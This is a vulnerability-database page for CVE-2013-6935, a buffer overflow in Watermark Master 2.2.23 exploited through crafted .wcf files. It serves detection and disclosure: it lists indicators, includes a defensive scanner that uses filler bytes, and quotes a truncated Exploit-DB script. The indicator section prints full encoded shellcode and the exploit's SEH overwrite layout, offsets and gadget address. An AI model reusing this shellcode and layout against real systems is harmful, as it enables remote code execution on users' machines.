CVE-2013-6935
Published: 2013-12-04
Priority: P3 54 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit available
EPSS: 32.35% (98.1st percentile)
Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in a .wcf file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| videocharge | watermark_master | — | — |
Detection & IOCs (extracted from sources)
- bytes: `\xeb\x06\x90\x90`
- bytes: `0x02700fee : popad # jmp ebp`
- bytes (encoded shellcode): `\xbb\x80\xa3\x02\xb2\xda\xcc\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\x33\x31\x5e\x12\x03\x5e\x12\x83\x6e\x5f\xe0\x47\x92\x48\x6c\xa7\x6a\x89\x0f\x21\x8f\xb8\x1d\x55\xc4\xe9\x91\x1d\x88\x01\x59\x73\x38\x91\x2f\x5c\x4f\x12\x85\xba\x7e\xa3\x2b\x03\x2c\x67\x2d\xff\x2e\xb4\x8d\x3e\xe1\xc9\xcc\x07\x1f\x21\x9c\xd0\x54\x90\x31\x54\x28\x29\x33\xba\x27\x11\x4b\xbf\xf7\xe6\xe1\xbe\x27\x56\x7d\x88\xdf\xdc\xd9\x29\xde\x31\x3a\x15\xa9\x3e\x89\xed\x28\x97\xc3\x0e\x1b\xd7\x88\x30\x94\xda\xd1\x75\x12\x05\xa4\x8d\x61\xb8\xbf\x55\x18\x66\x35\x48\xba\xed\xed\xa8\x3b\x21\x6b\x3a\x37\x8e\xff\x64\x5b\x11\xd3\x1e\x67\x9a\xd2\xf0\xee\xd8\xf0\xd4\xab\xbb\x99\x4d\x11\x6d\xa5\x8e\xfd\xd2\x03\xc4\xef\x07\x35\x87\x65\xd9\xb7\xbd\xc0\xd9\xc7\xbd\x62\xb2\xf6\x36\xed\xc5\x06\x9d\x4a\x39\x4d\xbc\xfa\xd2\x08\x54\xbf\xbe\xaa\x82\x83\xc6\x28\x27\x7b\x3d\x30\x42\x7e\x79\xf6\xbe\xf2\x12\x93\xc0\xa1\x13\xb6\xa2\x24\x80\x5a\x0b\xc3\x20\xf8\x53`
- The vulnerability is triggered by a long string in the SourcePath XML value within a .WCF file; monitor for .WCF files containing abnormally large SourcePath values (>516 bytes of padding before the SEH overwrite).
- The SEH overwrite uses a short JMP (`\xeb\x06\x90\x90`) followed by a ROP gadget at address 0x02700fee (`popad # jmp ebp`); this byte sequence at the SEH chain offset (about 516 bytes into the SourcePath value) is a strong indicator of exploitation.
- The exploit uses a NOP sled of 100 bytes (`\x90` * 100) before the shellcode; scanning .WCF files for large NOP sleds embedded in XML attribute values can identify malicious files.
- The Metasploit module targets this vulnerability as a fileformat exploit for Windows; monitor for Watermark Master processes spawning unexpected child processes (e.g., calc.exe or cmd.exe) as a post-exploitation indicator.
- The exploit was tested only on Windows XP SP3; the hardcoded ROP gadget address (0x02700fee) is module-specific and may not be valid on other OS versions or patch levels.
- The shellcode uses msfencode with a bad-character filter excluding `\x00\x0a\x0d\x3c\x22\x26`; any detection based on raw shellcode bytes must account for encoder polymorphism if a different encoder or key is used.
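The detection notes above describe three file-level indicators (an oversized SourcePath value, the SEH overwrite byte sequence, and a 100-byte NOP sled). The following scanner is an added example written for this page, not code from the vulnerability record, Exploit-DB or the Metasploit module. It works on raw bytes rather than a parsed XML tree because the sample file header is Windows-1252 and the payload bytes are not valid text. The exact way SourcePath appears inside a .WCF file is not given on the page, so matching both an attribute form (`SourcePath="..."`) and an element form (`<SourcePath>...</SourcePath>`) is an assumption, as is the little-endian encoding of the gadget address as it would appear in the file. The suspicious sample is constructed with filler bytes in place of any shellcode.

```python
import re
from struct import pack

# Indicators and thresholds taken from the page's detection notes.
SEH_SHORT_JMP = b"\xeb\x06\x90\x90"
ROP_GADGET = pack("<I", 0x02700fee)      # assumed little-endian on-disk form of the gadget address
SEH_SIGNATURE = SEH_SHORT_JMP + ROP_GADGET
NOP_SLED = b"\x90" * 100
MAX_SOURCEPATH = 516                     # page: >516 bytes of padding precede the SEH overwrite

# Assumption: the page does not show how SourcePath is laid out, so both an
# attribute form and an element form are matched on the raw bytes.
_PATTERNS = (
    re.compile(rb'SourcePath\s*=\s*"([^"]*)"'),
    re.compile(rb"<SourcePath[^>]*>(.*?)</SourcePath>", re.S),
)


def extract_sourcepaths(data: bytes) -> list[bytes]:
    """Return every SourcePath value found in the raw .WCF bytes."""
    found = []
    for pattern in _PATTERNS:
        found.extend(m.group(1) for m in pattern.finditer(data))
    return found


def scan_wcf(data: bytes) -> list[str]:
    """Return the sorted set of indicator names present in a .WCF file's bytes."""
    hits = set()
    for value in extract_sourcepaths(data):
        if len(value) > MAX_SOURCEPATH:
            hits.add("oversized_sourcepath")
        if NOP_SLED in value:
            hits.add("nop_sled")
        if SEH_SIGNATURE in value:
            hits.add("seh_overwrite_signature")
    # The SEH signature is specific enough to flag anywhere in the file,
    # even if the value did not match one of the assumed SourcePath layouts.
    if SEH_SIGNATURE in data:
        hits.add("seh_overwrite_signature")
    return sorted(hits)


# Constructed benign sample; header mirrors the one in the Exploit-DB listing.
WCF_HEADER = (b'<?xml version="1.0" encoding="Windows-1252" ?>'
              b'<config ver="2.2.23.00">\n\n')
BENIGN_WCF = WCF_HEADER + b'<col SourcePath="C:\\video\\in.avi"/></config>'


def build_suspicious_sample() -> bytes:
    """Constructed test input following the layout the page describes
    (padding, SEH overwrite, NOP sled) with filler bytes instead of shellcode."""
    value = b"A" * MAX_SOURCEPATH + SEH_SIGNATURE + NOP_SLED + b"B" * 32
    return WCF_HEADER + b'<col SourcePath="' + value + b'"/></config>'


if __name__ == "__main__":
    print("benign:    ", scan_wcf(BENIGN_WCF))
    print("suspicious:", scan_wcf(build_suspicious_sample()))
```

The attribute regex stops at the first double quote, which is safe here: the page's bad-character list for the shellcode excludes `\x22` (double quote), `\x3c` (`<`) and `\x26` (`&`), so a payload that reaches the parser must stay inside the attribute quoting. As the last bullet above warns, only the length and SEH-signature checks are robust against re-encoded shellcode; the NOP-sled check catches this particular module's layout.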
No detection rules found.
Exploit-DB
Watermark Master 2.2.23 - Local Buffer Overflow (SEH) (exploitdb · 2013-11-01)
---
```python
#!/usr/bin/python
# Exploit Title: Watermark Master Buffer Overflow (SEH)
# Date found: 31.10.2013
# Exploit Author: metacom
# URL: http://www.videocharge.com/download.php
# Software Link: www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 2.2.23
# Vulnerable products: Watermark Master and Watermark Master + SDK
# Tested on: Windows XP SP3
# Poc video demo : http://bit.ly/19enbvN
from struct import pack
head=("\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30"
"\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D"
"\x31\x32\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D"
"\x22\x32\x2E\x32\x2E\x32\x33\x2E\x30\x30\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C
```
Metasploit
Watermark Master Buffer Overflow (SEH) (metasploit)
This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.
No writeups or analysis indexed.